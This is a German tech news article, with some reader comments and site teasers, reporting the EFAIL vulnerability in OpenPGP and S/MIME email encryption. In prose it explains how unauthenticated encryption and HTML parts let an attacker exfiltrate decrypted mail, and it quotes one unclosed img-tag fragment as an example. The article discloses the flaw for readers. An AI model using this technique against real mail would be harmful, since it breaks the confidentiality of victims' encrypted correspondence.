Abo
  • Services:

PGP/SMIME: Angreifer können sich entschlüsselte E-Mails schicken lassen

Ein Zusammenspiel von veralteten Verschlüsselungsmethoden und HTML-Mails erlaubt es in vielen Fällen, mit OpenPGP oder S/MIME verschlüsselte Nachrichten zu exfiltrieren. Bislang gibt es keine echten Fixes und nur unzureichende Workarounds.

Artikel von Hanno Böck veröffentlicht am
Ouch ... die Mailverschlüsselungsstandards S/MIME und OpenPGP nutzen uralte Verschlüsselungsverfahren - und das rächt sich jetzt bitter.
Ouch ... die Mailverschlüsselungsstandards S/MIME und OpenPGP nutzen uralte Verschlüsselungsverfahren - und das rächt sich jetzt bitter. (Bild: Jana Runde/Zuzana Somorovska)

Ein Forscherteam hat eine ganze Reihe von Problemen bei der Verwendung verschlüsselter E-Mails entdeckt. Die E-Fail getaufte Lücke betrifft beide standardisierten E-Mail-Verschlüsselungsverfahren - OpenPGP und S/MIME - und lässt sich in zahlreichen E-Mail-Clients ausnutzen.

Inhalt:
  1. PGP/SMIME: Angreifer können sich entschlüsselte E-Mails schicken lassen
  2. Verschlüsselung nicht authentifiziert
  3. Workarounds, Updates, Gegenmaßnahmen

Das Grundproblem: Verschlüsselung ohne Authentifizierung. S/MIME nutzt einen völlig unauthentifizierten Verschlüsselungsmodus, in OpenPGP ist zwar theoretisch eine Authentifizierung vorgesehen, die ist aber in der Praxis oft nutzlos.

Die Angriffe nutzen HTML-Mails, um entschlüsselte Daten an den Server des Angreifers zu schicken. Dabei wird eine bestehende E-Mail so umgestaltet, dass der HTML-Code eine Anfrage zu einem Server auslöst und dabei den entschlüsselten Text der Mail mitschickt.

Angriff über Multipart-Mails

Bereits daraus lässt sich in manchen Fällen ein Angriff konstruieren. E-Mail-Nachrichten können aus mehreren Teilen bestehen, sogenannte Multipart-Messages. In manchen Mailclients - am einfachsten in Apple Mail - ist es möglich, direkt aus dem HTML-Teil einer Nachricht auf den nachfolgenden Textteil zuzugreifen.

Stellenmarkt
  1. InnoLas Solutions GmbH, Krailling Raum München
  2. SYNCHRON GmbH, Stuttgart

Ein Angreifer kann nun Folgendes machen: Er schickt als ersten Teil einer Nachricht einen HTML-Teil, der beispielsweise ein Bild lädt, aber den HTML-Tag nicht schließt. Also etwa <img src="http://efail.de/. Als zweiten Teil hängt er den verschlüsselten Teil einer Mail an, die er mitgelesen hat, etwa über einen Man-in-the-Middle-Angriff zwischen den Mailservern. Im Mailclient des Opfers passiert nun Folgendes: Ein Bild wird vom Server des Angreifers geladen und als Pfad wird der Inhalt des nachfolgenden Textteils codiert angehängt.

In Apple Mail funktioniert dieser Angriff direkt, in Mozilla Thunderbird werden in der Standardeinstellung keine Bilder geladen. Doch auch hier ist es mit Tricks möglich, eine Exfiltration der Daten zu erreichen. So kann man beispielsweise per HTML ein Formular erzeugen, das die Daten des verschlüsselten Teils an den Angreifer schickt. Da man die Mail über CSS beliebig layouten kann, kann man das auch so machen, dass ein Klick irgendwo in der Mail dazu führt, dass das Formular abgeschickt wird.

Verschlüsselung nicht authentifiziert 
  1. 1
  2. 2
  3. 3
  4.  


Anzeige
Spiele-Angebote
  1. 1,29€
  2. 3,99€
  3. 11,29€
  4. 39,99€

joo 17. Mai 2018 / Themenstart

-------------------------------------------------------------------------------- +1...

phade 15. Mai 2018 / Themenstart

Zumeist Mail von der Seamonkey-Suite (ergo Thunderbird). Nur nutzt das nix, wenn das für...

Mr Miyagi 15. Mai 2018 / Themenstart

Natürlich *kann* es das. GnuPG könnte auch ein Abbild Deiner ganzen Mailbox im Speicehr...

Mr Miyagi 15. Mai 2018 / Themenstart

Erklär doch mal bitte was an E-Mail kaputt ist. Ende un Ende Verschlüsselung funktionier...

freebyte 15. Mai 2018 / Themenstart

"Authenticated Encryption" bedeutet letztendlich nur, dass dem schützbaren Teil der...

Kommentieren


Folgen Sie uns
       


Huawei P20 Pro - Hands on

Huaweis neues Smartphone P20 Pro kommt mit drei Hauptkameras und einer Reihe von KI-Funktionen. Wir haben uns das Gerät in einem ersten Hands on angeschaut.

Huawei P20 Pro - Hands on Video aufrufen
Ryzen 5 2600X im Test: AMDs Desktop-Allrounder
Ryzen 5 2600X im Test
AMDs Desktop-Allrounder

Der Ryzen 5 2600X ist eine der besten sechskernigen CPUs am Markt. Für gut 200 Euro liefert er die gleiche Leistung wie der Core i5-8600K. Der AMD-Chip hat klare Vorteile bei Anwendungen, das Intel-Modell in Spielen.
Ein Test von Marc Sauter

  1. Golem.de-Livestream Wie gut ist AMDs Ryzen 2000?
  2. RAM-Overclocking getestet Auch Ryzen 2000 profitiert von schnellem Speicher
  3. Ryzen 2400GE/2200GE AMD veröffentlicht sparsame 35-Watt-APUs

Datenschutz-Grundverordnung: Was Unternehmen und Admins jetzt tun müssen
Datenschutz-Grundverordnung
Was Unternehmen und Admins jetzt tun müssen

Ab dem 25. Mai gilt europaweit ein neues Datenschutz-Gesetz, das für Unternehmen neue rechtliche Verpflichtungen schafft. Trotz der nahenden Frist sind viele IT-Firmen schlecht vorbereitet. Wir erklären, was auf Geschäftsführung und Admins zukommt.
Von Jan Weisensee

  1. IT-Konzerne Merkel kritisiert Pläne für europäische Digitalsteuer
  2. EU-Kommission Mehr Transparenz für Suchmaschinen und Online-Plattformen
  3. 2019 Schweiz beginnt UKW-Abschaltung

Kryptographie: Der Debian-Bug im OpenSSL-Zufallszahlengenerator
Kryptographie
Der Debian-Bug im OpenSSL-Zufallszahlengenerator

Einer der schwerwiegendsten Fehler in der Geschichte der Kryptographie beschäftigte vor zehn Jahren Nutzer der Debian-Distribution. Wenn man danach sucht, findet man noch heute vereinzelt verwundbare Schlüssel.
Von Hanno Böck


      •  /